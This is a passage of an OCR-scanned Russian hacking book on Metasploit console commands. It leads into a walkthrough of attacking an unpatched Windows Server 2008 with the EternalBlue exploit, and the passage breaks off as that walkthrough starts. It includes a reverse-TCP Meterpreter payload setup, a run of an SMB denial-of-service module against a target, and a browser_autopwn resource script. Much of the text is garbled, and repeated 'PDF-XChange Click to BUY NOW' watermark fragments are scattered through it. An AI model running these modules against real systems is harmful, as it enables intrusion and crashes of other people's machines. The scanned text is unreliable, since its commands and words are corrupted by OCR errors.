|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
|
X |
|
|
|
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
|
F |
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
|
P |
|
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
loadpath |
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
|
. |
|
f-xchanpath |
|
|
|
|
|
|
|
|
.c |
|
|
|
|
p |
d |
|
|
|
|
e |
|
|
|
|
|
|
|
|
|
g |
|
|
|
|
quit resource
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
|
X |
|
|
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
|
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
P |
|
|
|
|
|
NOW! |
o |
1 1ав.1 .... ( |
l'l,Jll' 11.1 \ll-ta,pl111I |
BUY |
|
|
|
|
|
|
|
|
to |
|
|
|
|
|
Searches for and loads modules from а |
w Click |
|
|
|
|
|
m |
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
|
. |
|
|
|
|
|
.c |
|
|
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
|
|
-x cha |
|
|
|
|
Exit the console |
|
|
|
|
|
|
|
|
|
|
|
|
Run the commands stored in а |
file |
|
|
|
|
|
|
|
|
|
|
|
Примечание. Здесь и далее мы будем опускать часть вывода Metasploit, поскольку его консоль может генерировать довольно
длинный вывод, который публиковать в книге особо не хочется.
7.7.2. Команда use- выбор модуля для использования
Команда use позволяет использовать выбрать для работы определенный мо дуль, например:
use exploit/windows/smЬ/ms
use exploit/windows/smЬ/msOЗ 049_netapi use exploit/windows/smЬ/ms04_007_killbill use exploit/windows/smЬ/ms04 011 lsass
Рис. 7. 7. Команда use
Примечание. Одна из особенностей консоли - автозавершение
команд, подобно тому, которое используется в командной строке
Linux. Просто начни вводить текст, а затем нажми ТаЬ и консоль или дополнит твою команду или предложит несколько вариан-
тов.
, _ - - -- ----- - -- - - |
_·_ - - ----- ------ --- --- --- - -- --- -- -- --- --- --- -- - --- |
. -- - -- - -- --- -- - - |
111 |
The "none" Encoder XOR Encoder
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
X |
|
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
|
- |
|
|
|
|
|
d |
|
|
F |
|
|
|
|
|
|
|
i |
|
|
|
F |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
t |
|
|
|
|
|
|
|
|
|
|
t |
|
P |
D |
|
|
|
|
|
|
|
|
o |
|
P |
D |
|
|
|
|
|
|
|
|
o |
|
|
|
|
NOW! |
r |
|
|
|
|
|
NOW! |
r |
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
7.7.3. Команда show- показ сущностей |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
m |
w |
|
|
|
|
|
|
|
|
|
m |
w Click |
|
|
|
|
|
|
o |
w Click |
|
|
|
|
|
|
o |
|
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
|
.c |
|
|
|
. |
|
|
|
|
|
|
.c |
|
|
|
p |
df |
|
|
|
|
e |
|
|
|
|
p |
df |
|
|
|
|
e |
|
|
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
g |
|
|
|
|
|
|
|
|
n |
|
|
|
|
|
|
|
|
|
|
n |
|
|
|
|
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
Команда show покажет все доступные сущности (модули, опции, цели и т.д.). Команде show нужно передать тип сущности или слово all, чтобы вывести все установленные модули. Вывод команды show а//:
msfб > show all Encoders
Name |
Description |
cmd/generic sh |
Generic Shell VariaЫe |
Substitution Command Encoder generic/none mipsbe/longxor
Вывод очень большой и может продолжаться несколько минут. Поэтому луч ше всего изучать список модулей по rруппам. Доступны следующие rруппы:
•encoders
•nops
•exploits
•payloads
•auxiliary
•post
•plugins
Также в конце вывода show а// выводится список установленных плагинов:
[*] AvailaЫe Framework plugins * nessus
* rssfeed
*sqlmap
*sounds
*auto add route
*request
*aggregator
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
|
X |
|
|
|
|
|
|
|
|
|
- |
|
|
|
|
|
|
d |
|
|
|
F |
|
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
P |
|
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
|
to |
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
|
*m |
rnsgrpc |
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
f-xchan |
|
|
o |
* |
rnsfd |
|
. |
|
|
.c |
|
|
p |
d |
|
|
|
|
|
e |
|
|
|
|
|
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
* |
nexpose |
|
|
|
|
|
|
|
|
|
|
|
|
* |
db credcollect |
|
|
|
|
|
|
|
|
|
|
|
|
* |
libnotify |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
X |
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
to |
|
|
|
|
|
w Click |
|
|
|
|
|
m |
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
-x cha |
|
|
|
|
*thread
*alias
*session_tagger
*token adduser
*pcap_log
*sarnple
*beholder
*socket_logger
*openvas
*ernap
*wiki
*even.t tester
*token hunter
*ffautoregen
*session notifier
*lab
*db tracker * ips_filter
Наиболее часто тыбудешь использовать команды:
show auxiliary show exploits show payloads
Выполнение show auxiliary, отобразит распечатку всех доступных вспомога тельных модулей в пределах Metasploit. Как упомянуто более ранние, вспо могательные модули включают сканеры, модули отказа в обслуживании, fuzzers, и больше.
Команда show exploits будет для тебя самая интересная. Выполни show ex ploits, чтобы получить есть распечатку про все эксплойты, связанные в од ной.логической среде.
Выполнение show payloads покажет все полезные нагрузки для всех плат форм, доступных в пределах Metasploit. Команда show options покажет на стройки модуля, если ты выбрал конкретный модуль. ...
Рассмотримнебольшой пример:
•. ............................................ .......... . ..........................
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
C |
|
E |
|
|
|
|
|
X |
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
- |
|
|
|
|
|
d |
|
|
F |
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
|
r |
P |
|
|
|
|
|
NOW! |
o |
|
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
to |
|
|
|
|
|
|
w Click |
msf6>m |
use exploit/windows/smЬ/ms03_049_netapi |
w Click |
|
|
|
|
|
|
m |
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
w |
|
|
-x cha |
|
|
|
o |
|
|
. |
|
-xcha[*] Using configured payload windows/meterpreter/reserse tcp |
|
|
.c |
|
|
|
p |
|
|
|
|
g |
|
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
msf6> show options
Module options (exploit/windows/smЬ/ms0З 049_netapi):
Name |
|
Current Setting |
Required |
Description |
RHOSTS |
yes |
The target |
host (s), range... |
RPORT |
445 |
yes |
The SMB service port |
(ТСР) |
|
|
|
|
|
SMBPIPEBROWSER |
yes |
The pipe name to use |
(BROWSER... |
|
|
|
Payload options (windows/meterpreter/reserse_tcp): |
Name |
|
Current Setting |
Required |
Description |
EXITFUNC thread |
yes |
Exit technique |
(Accepted... |
|
|
|
LHOST |
192.168.84.136 |
yes |
The listen |
address |
|
(an interf_ |
|
|
LPORT |
4444 |
yes |
The listen port |
Exploit target: |
|
|
|
Id |
Name |
|
|
|
О |
Windows ХР |
SP0/SPl |
|
|
showpayloads,
CompatiЫe Payloads |
|
|
# |
Name |
Disclosure Date Rank |
Check |
Description |
О |
generic/custom |
normal |
No |
Custom Payload |
|
|
1 |
generic/debug_trap |
normal |
No |
Generic х86 |
Deb... |
|
|
show targets
Exploit targets:
•
-··················································································
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
X |
|
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
|
F |
|
|
|
|
|
|
t |
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
P |
|
|
|
|
|
NOW! |
|
o |
|
|
|
|
|
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
|
Idm |
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
. |
|
|
|
|
|
.c |
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
О |
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
X |
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
P |
|
|
|
|
|
NOW! |
o |
1 1.111.1 "'. ( Lчн·11.1 \ll'!.1,ploil |
BUY |
|
|
|
|
|
|
to |
|
|
|
|
|
w Click |
|
|
|
|
|
m |
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
-x cha |
|
|
|
|
Это довольно старенький эксruюйт. Давай посмотрим на более новые ва рианты. Для этого используем команду search. Будем искать по названию уязвимости - ethemalЫue:
msfб>search eternalЫue Matching Modules
Name |
Disclosure Date Rank |
Check |
Description |
|
auxiliary/admin/smЬ/ms17 010 command 2017-03-14 |
normal |
Yes |
MSl7-010... |
|
auxiliary/scanner/smЬ/smЬ_ms17 010 |
normal |
Yes |
MS17-010_ |
|
exploit/windows/smЬ/ms17 0l0_eternalЬlue 2017-03-14 |
average |
No |
MS17-010_ |
|
exploit/windows/smЬ/ms17_010_eternalЬlue_win8 2017-03-14
average No ...
Попробуем использовать этот эксплойт:
back
use exploit/windows/smЬ/msl7 010 ethernalЫue show targets
Exploit target:
Id Name
ОWindows 7 and Server 2008 R2 (хб4) All Service Packs
Этот эксплойт уже посвежее. Также есть аналогичный эксплойт для Windows 8.
Команда info выведет подробную информацию о специфическом модуле, включая все опции, цели, и другую информацию:
msf > info dos/windows/smЬ/ms09 001 write
Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset
• Version: 6890
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
X |
|
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
License: Metasploit Framework License (BSD) |
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
.c |
|
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
|
-xcha |
|
|
|
|
|
Provided Ьу: j.v.vallejo
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
X |
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
to |
|
|
|
|
|
w Click |
|
|
|
|
|
m |
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
-x cha |
|
|
|
|
Когда ты выбрал конкретный модуль, для его использования применяй ко манду use. Обрати внимание в выводе ниже на.глобальную переменную, ко торая была установлена, в ранее уже установленной конфигурации (RPORT).
use dos/windows/smЬ/ms09 001 write
msf auxiliary(ms09 00l_write) > show options Module options:
Name |
Current Setting |
Required |
Description |
|
RHOST |
|
yes |
The |
target address |
RPORT |
445 |
yes |
Set |
the SMB |
service |
port
Команда connect позволяет соединиться с IР-адресом (по номеру порта) из msfconsole так же, как будто бы ты используешь netcat или telnet:
connect 192.168.1.1 23
[*] Connected to 192.168.1.1:23 Hello
DD-WRT v44 std (с) 2018 NewMedia-NET GmЬH Release: 07/27/18 (SVN revision: 20011) DD-WRT login:
7.7.4. Команды set и setg - установка значений переменных
Команда set позволяет установить опцию модуля. Команда setg устанавлива ет глобальную опцию, заданное значение будет доступно для всех модулей.
Установить значение опции можно так:
set RHOST 192.168.1.1 RHOST => 192.168.1.1
msf auxiliary(ms09 00l_write) > show options
Module options: |
|
- |
• |
.......................... |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
X |
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
to |
|
|
|
|
|
w Click |
|
|
|
|
|
m |
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
-xcha |
|
|
|
|
Narne Current Setting Required Description
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
X |
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
to |
|
|
|
|
|
w Click |
|
|
|
|
|
m |
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
-x cha |
|
|
|
|
RHOST |
192.168.1.1 |
yes |
The |
target address |
RPORT |
445 |
yes |
Set |
the SMB service |
port |
|
|
|
|
Для |
|
setg, |
|
|
|
|
|
для |
rnsf6 > setg LHOST 192.168.1.101 LHOST => 192.168.1.101
msf6 > setg RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24
msf6 > setg RHO$T 192.168.1.136 RHOST => 192.168.1.136
msf6 > save
Saved configuration to: /root/.msf6/config msf6 >
save.
7.7.5. 1':оманда check - проверка целевой системы
check,
msf6 exploit(ms04 045_wins) > show options
Module options:
' Name Current Setting
.. - ... ·-. - ·--- --- --- - - -.. - - .--- - - .-- .
Required Description ...
-... - . -- - . - - . ·-. - .- - - . - -- - . ---- - - ...-- --- -
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
X |
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
F |
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
t |
|
P |
D |
|
|
|
|
|
|
|
o |
|
|
|
|
NOW! |
r |
|
|
|
|
|
BUY |
|
|
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
m |
w Click |
|
|
n |
|
o |
|
w |
|
df |
|
|
|
RHOST |
|
. |
|
|
|
|
|
.c |
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
-xcha |
|
e |
|
|
|
|
|
|
|
|
RPORT |
|
|
|
|
|
|
|
|
|
|
The target address The target port
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
X |
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
to |
|
|
|
|
|
w Click |
|
|
|
|
|
m |
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
-x cha |
|
|
|
|
Exploit target:.
Id Name
ОWindows 2000 English
msf6 exploit(ms04_045_wins) > check
[-] Check failed: The connectio was refused Ьу the remote host (192.168.1.114:42)
В данном случае целевая система не годится для проверки, поскольку соеди нение бьmо закрыто удаленным узлом.
7.7.6. Команда back- возврат
Когда ты закончишь работу с определенным модулем, введи команду back для возврата обратно. Дальше ты сможешь выбрать другой модуль и про
должить работу.
7.7.7. Команда run - запуск эксплойта
Запустить подготовленный эксплойт можно командой run:
msf6 auxiliary(ms09 00l_write) > run
Attempting to crash the remote host...
datalenlow=65535 dataoffset=65535 filleisize=72 rescue
datalenlow=55535 dataoffset=65535 fillersize=72 rescue
datalenlow=45535 dataoffset=65535 fillersize=72 rescue
datalenlow=35535 dataoffset=65535 fillersize=72 rescue
datalenlow=25535 dataoffset=65535 fillersize=72 rescue
11118- ---- - . - - .-.--.-.--. - - - - .---.----.---..-------..--.----.-------. - - .-- ---- . ----_,
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
X |
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
to |
|
|
|
|
|
w Click |
|
|
|
|
|
m |
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
X |
|
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
to |
|
|
|
|
|
7.7.8. Команда resource - определение ресурса |
w Click |
|
|
|
|
|
m |
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
.c |
|
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
|
-x cha |
|
|
|
|
resource.
msfб > resource karma.rc resource> load dЬ_sqliteЗ [-]
[-] The functionality previous1y provided Ьу this plugin has been
[-] integrated into the core comrnand set. Use the new 'db driver'
[-] comrnand to use а database driver other than sqliteЗ (which
[-] is now the default). All of the old comrnands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/ framework3/plugins/db_sqlite3: Deprecated plugin resource> db create /root/karma.db
[*]The specified database already exists, connecting [*] Successful1·у connected to the database
[*]File: /root/karma.db
resource> use auxiliary/server/browser_autopwn resource> setg AUTOPWN_HOST 1О. О..О.1
AUTOPWN HOST => 10.0.0.1
7.7.9. Команда irb
Ruby,
msfб > irb
[*]Starting IRB shell...
[*]You are in the "framework" object
•>> p ts «Hello, metasploit!» Hello, metasploit!
··················································································tD
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
X |
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
to |
|
|
|
|
|
|
. |
|
7.8. Практический пример 1: взламываем |
|
|
|
w Click |
|
|
|
|
|
|
m |
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
p |
|
|
|
|
|
.c |
|
|
|
|
|
|
|
g |
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
|
старенький сервер Windows 2008 с помощью |
|
|
|
|
-xcha |
|
|
|
|
эксплойта АНБ
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
X |
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
to |
|
|
|
|
|
w Click |
|
|
|
|
|
m |
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
-x cha |
|
|
|
|
Наконец-то мы добрались до самого интересного. Настало время собрать все воедино и использовать изученные команды на практике. Мы будем ис пользовать эксплойт EtemalВlue.
EtemalВlue - это эксплойт, который, скорее всего, был разработан АНБ в ка честве бывшей уязвимости нулевого дня. Он был выпущен в 2017 году ха керской группой Shadow Brokers, которая сющдально известна утечками ин формации и эксплойтов из Equation Group, которая, как поговаривают, тесно связана с отделом АНБ ТАО(Tailored Access Operations).
Эксплойт EtemalВlue также известен как MSl7-010 представляет собой уяз вимость в протоколе Microsoft Server Message Block(SMB). SМВпозволяет системам совместно использовать доступ к файлам, принтерам и другие ре сурсы в сети. Уязвимость присутствует в немного устаревчшхверсиях SMB, позволяющую хакеру установить соединение с нулевым сеансом через ано нимный вход. Затем хакер сможет отправлять модифицированные пакеты и выполнять произвольные команды на целевой системе.
В качестве жертвы мы будем использовать старенькую и непропатченную ОС Windows Server 2008 R2. Чтобы повторить наш подвиг, тебе нужно ска чать такую же. Не нужно думать, что это очень старая операционка - много организаций до сих пор используют ее даже в 2020 году, поскольку ряд кри зисов не позволяет обновить железо и купить новый софт. Да и сама опера ционная система до сих пор(!) доступна для загрузки на сайте Microsoft:
https://www.microsoft.com/en-us/download/details.aspx?id=11093
По этой ссылке ты можешь скачать ее совершенно бесплатно(180-дневная версия).
Итак, запусти Metasploit. Это можно сделать или посредством графического интерфейса или командой msfconsole.
Далее мы попытаемся найти подходящие модули. Вывод мы сократили(он достаточно «широкий», чтобы поместиться на книжном листе), поэтому мы
оставили только названия модулей:
search eternalЫue |
|
Matching Modules |
|
18-- - - -- --- --- --- - --- ---- -------- - - --- - --------- --- ----- - --------------- ---------- |
' |